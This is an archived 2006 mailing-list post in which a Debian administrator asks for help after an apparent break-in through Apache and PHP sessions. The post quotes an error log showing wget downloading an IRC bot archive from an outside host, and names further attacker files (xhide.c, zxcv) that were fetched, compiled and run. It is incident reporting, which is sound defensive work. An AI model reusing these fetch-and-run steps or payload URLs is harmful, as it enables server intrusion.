lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [thread-next>] [day] [month] [year] [list] 
Message-ID: <445E360D.40803@f-s.at>
Date: Sun May  7 19:01:55 2006
From: php-sec at f-s.at (Fabio Saber)
Subject: Apache Security Problem - need help

Hallo Liste,

ich stehe hier vor einem gr?beren Problem. Auf mein System (Debian) 
wurde ein Angriff ?ber (ich vermute mal) Apache (Apache/1.3.33) 
durchgef?hrt.
Ich gehe davon aus, dass irgendwie Session Daten manipuliert worden sind 
und dadurch Dateien downgeloadet wurden.

Ein Auszug aus der Apache error.log zeigt folgendes:

Hello list,

I've some troubles with Apache (1.3.33) on a Debian system. I suppose 
that someone manipulated active sessions (PHP) and got access to my system.
A short extract from my apache error.log

-------------------
error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
sh: line 1: cd: .sess_f345236263adsdadas2737237723: No such file or 
directory
--19:32:36--  http://mrx88.altervista.org/iroffer.tar
          => `iroffer.tar'
Resolving mrx88.altervista.org... done.
Connecting to mrx88.altervista.org[67.15.189.15]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 126,773 [application/x-tar]

   0K .......... .......... .......... .......... .......... 40%   66.14 
KB/s
  50K .......... .......... .......... .......... .......... 80%  146.63 
KB/s
 100K .......... .......... ...                             100%  208.79 
KB/s

19:32:38 (102.23 KB/s) - `iroffer.tar' saved [126773/126773]

error: 'kern.ostype' is an unknown key
error: 'kern.osrelease' is an unknown key
sh: line 1: cd: .sess_f345236263adsdadas2737237723: No such file or 
directory
-------------------

I can't understand why these lines are in the error.log?
Also some other files have been loaded: 
http://mrx88.altervista.org/xhide.c   and 
http://ninobuccheri86.altervista.org/zxcv.

The downloaded program has also been compiled and started.

Thanks for help!

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ